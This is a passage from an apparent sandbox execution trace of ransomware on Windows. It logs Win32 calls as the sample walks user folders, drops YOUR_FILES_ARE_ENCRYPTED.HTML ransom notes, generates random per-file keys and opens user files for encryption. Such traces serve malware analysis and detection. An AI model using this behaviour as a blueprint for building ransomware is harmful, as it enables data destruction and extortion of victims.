(hObject=0x328) returned 1 [0124.542] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="Links", cAlternateFileName="")) returned 1 [0124.542] StrStrIW (lpFirst="Links", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.542] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links") returned 41 [0124.542] GetProcessHeap () returned 0x600000 [0124.542] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0124.543] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links" [0124.543] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\*" [0124.543] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0124.544] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0124.544] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x43079e90, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0124.544] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.544] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\desktop.ini") returned 53 [0124.544] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0124.544] lstrlenW (lpString=".ini") returned 4 [0124.544] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0124.544] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0124.544] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\links\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0124.544] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=80) returned 1 [0124.544] CloseHandle (hObject=0x32c) returned 1 [0124.544] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x43079e90, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0124.544] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0124.544] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0124.545] GetProcessHeap () returned 0x600000 [0124.545] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0124.545] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\links\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0124.546] WriteFile (in: hFile=0x328, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0124.547] CloseHandle (hObject=0x328) returned 1 [0124.547] GetProcessHeap () returned 0x600000 [0124.547] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0124.547] GetProcessHeap () returned 0x600000 [0124.547] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0124.547] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="Links", cAlternateFileName="")) returned 0 [0124.547] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0124.547] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 65 [0124.547] GetProcessHeap () returned 0x600000 [0124.547] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0124.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0124.548] WriteFile (in: hFile=0x314, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0124.549] CloseHandle (hObject=0x314) returned 1 [0124.549] GetProcessHeap () returned 0x600000 [0124.549] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0124.549] GetProcessHeap () returned 0x600000 [0124.550] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0124.550] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Links", cAlternateFileName="")) returned 1 [0124.550] StrStrIW (lpFirst="Links", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.551] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Links") returned 31 [0124.551] GetProcessHeap () returned 0x600000 [0124.551] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0124.551] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Links" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Links") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Links" [0124.551] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Links", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Links\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Links\\*" [0124.551] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Links\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0124.552] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="..", cAlternateFileName="")) returned 1 [0124.552] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x43754b80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0124.552] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.552] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Links\\desktop.ini") returned 43 [0124.552] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0124.552] lstrlenW (lpString=".ini") returned 4 [0124.552] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0124.552] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.552] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Links\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\links\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.552] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=504) returned 1 [0124.552] CloseHandle (hObject=0x328) returned 1 [0124.552] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437c7194, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437c7194, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x207, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0124.553] StrStrIW (lpFirst="Desktop.lnk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.553] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Links\\Desktop.lnk") returned 43 [0124.553] PathFindExtensionW (pszPath="Desktop.lnk") returned=".lnk" [0124.553] lstrlenW (lpString=".lnk") returned 4 [0124.553] PathFindExtensionW (pszPath="Desktop.lnk") returned=".lnk" [0124.553] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437c7194, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437c7194, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x3d0, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0124.553] StrStrIW (lpFirst="Downloads.lnk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.553] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Links\\Downloads.lnk") returned 45 [0124.553] PathFindExtensionW (pszPath="Downloads.lnk") returned=".lnk" [0124.553] lstrlenW (lpString=".lnk") returned 4 [0124.553] PathFindExtensionW (pszPath="Downloads.lnk") returned=".lnk" [0124.553] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437c7194, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437c7194, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x3d0, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 0 [0124.553] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0124.553] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Links\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 61 [0124.553] GetProcessHeap () returned 0x600000 [0124.553] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0124.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Links\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\links\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0124.555] WriteFile (in: hFile=0x314, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0124.556] CloseHandle (hObject=0x314) returned 1 [0124.556] GetProcessHeap () returned 0x600000 [0124.557] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0124.557] GetProcessHeap () returned 0x600000 [0124.557] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0124.557] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0124.557] StrStrIW (lpFirst="Local Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.557] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Local Settings") returned 40 [0124.557] GetProcessHeap () returned 0x600000 [0124.557] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0124.558] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Local Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Local Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Local Settings" [0124.558] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Local Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Local Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Local Settings\\*" [0124.558] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Local Settings\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437c7194, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437c7194, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x3d0, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="Downloads.lnk", cAlternateFileName="翿")) returned 0xffffffff [0124.558] GetProcessHeap () returned 0x600000 [0124.558] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0124.558] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x527ce871, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x527ce871, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Music", cAlternateFileName="")) returned 1 [0124.558] StrStrIW (lpFirst="Music", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.558] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music") returned 31 [0124.558] GetProcessHeap () returned 0x600000 [0124.558] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0124.558] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music" [0124.558] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\*" [0124.558] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x527ce871, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x527ce871, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0124.559] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x527ce871, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x527ce871, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="..", cAlternateFileName="")) returned 1 [0124.559] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43649a85, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43649a85, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0124.559] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.559] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\desktop.ini") returned 43 [0124.559] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0124.559] lstrlenW (lpString=".ini") returned 4 [0124.559] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0124.559] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.559] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=504) returned 1 [0124.560] CloseHandle (hObject=0x328) returned 1 [0124.560] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d98a9f0, ftCreationTime.dwHighDateTime=0x1d70876, ftLastAccessTime.dwLowDateTime=0x2590d950, ftLastAccessTime.dwHighDateTime=0x1d7095c, ftLastWriteTime.dwLowDateTime=0x2590d950, ftLastWriteTime.dwHighDateTime=0x1d7095c, nFileSizeHigh=0x0, nFileSizeLow=0x2a33, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="dpTDqU7W8QtcX-Gy.wav", cAlternateFileName="DPTDQU~1.WAV")) returned 1 [0124.560] StrStrIW (lpFirst="dpTDqU7W8QtcX-Gy.wav", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.560] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\dpTDqU7W8QtcX-Gy.wav") returned 52 [0124.560] PathFindExtensionW (pszPath="dpTDqU7W8QtcX-Gy.wav") returned=".wav" [0124.560] lstrlenW (lpString=".wav") returned 4 [0124.560] PathFindExtensionW (pszPath="dpTDqU7W8QtcX-Gy.wav") returned=".wav" [0124.560] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.560] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\dpTDqU7W8QtcX-Gy.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\dptdqu7w8qtcx-gy.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.561] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=10803) returned 1 [0124.561] GetProcessHeap () returned 0x600000 [0124.561] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.563] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="71") returned 2 [0124.563] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="17") returned 2 [0124.563] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="E4") returned 2 [0124.563] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="48") returned 2 [0124.563] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="E5") returned 2 [0124.563] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="F7") returned 2 [0124.563] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="64") returned 2 [0124.563] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="9A") returned 2 [0124.563] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="46") returned 2 [0124.563] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="12") returned 2 [0124.563] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="DE") returned 2 [0124.563] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="DA") returned 2 [0124.564] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="86") returned 2 [0124.564] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="CA") returned 2 [0124.564] wsprintfW (in: 